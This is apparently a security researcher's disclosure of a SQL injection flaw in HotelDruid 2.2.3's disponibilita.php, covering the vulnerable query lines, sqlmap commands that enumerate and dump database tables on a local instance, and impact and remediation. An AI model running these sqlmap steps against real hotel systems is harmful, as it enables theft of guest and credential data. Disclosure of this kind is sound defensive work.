← Achievements

HotelDruid 2.2.3: SQL Injection in disponibilita.php

📅 2026-01-15 📂 Vulnerability Discovery
SQLiHotelDruidWeb SecurityDatabase
TL;DR:
SQL injection vulnerability in HotelDruid 2.2.3 via unsanitized inizioperiodo and fineperiodo parameters in disponibilita.php, allowing full database extraction.

Summary

HotelDruid version 2.2.3 contains a SQL injection vulnerability in the disponibilita.php script. The application fails to properly sanitize or parameterize the inizioperiodo and fineperiodo input parameters before incorporating them into SQL queries. An attacker can exploit this by supplying specially crafted date strings that break out of the single-quoted string literals in the SQL statement, allowing the execution of arbitrary SQL commands.

Vulnerable Code

The vulnerability occurs in disponibilita.php because the inizioperiodo and fineperiodo variables, populated from user-controlled global variables (via $_GET or $_POST), are used directly in SQL queries:

Code 1 — disponibilita.php:180:

$idinizioperiodo = esegui_query("select idperiodi from $tableperiodi where datainizio = '$inizioperiodo' ");

Code 2 — disponibilita.php:184:

$idfineperiodo = esegui_query("select idperiodi from $tableperiodi where datafine = '$fineperiodo' ");

Both parameters are injected directly into the SQL query without any escaping, parameterization, or input validation.

Proof of Concept

The vulnerability can be exploited using sqlmap for automated extraction:

Table Enumeration

sqlmap -u 'http://localhost:8080/disponibilita.php?inizioperiodo=2026-01-01' --batch --tables

This reveals 36 tables including sensitive ones:

+---------------------+
| utenti              |
| clienti             |
| sessioni            |
| prenota2026         |
| privilegi           |
| transazioni         |
| soldi2026           |
| ...                 |
+---------------------+

Data Extraction

sqlmap -u 'http://localhost:8080/disponibilita.php?inizioperiodo=2026-01-01' --batch -T versioni --dump

Table: versioni [2 entries]
+------------+--------------+
| idversioni | num_versione |
+------------+--------------+
| 1          | 2.23         |
| 2          | 100.0        |
+------------+--------------+

Impact

A successful exploit allows an unauthenticated or authenticated attacker (depending on the instance configuration) to perform:

  • Data Extraction — Accessing sensitive information such as user credentials, guest data, and system configurations
  • Data Modification — Altering reservation records or user permissions
  • Data Deletion — Causing data loss or service disruption
  • System Compromise — In some configurations, this could lead to full control over the database server

Remediation

  • Use parameterized queries or prepared statements
  • Implement input validation and sanitization on all user-controlled parameters
  • Apply the principle of least privilege to database accounts

References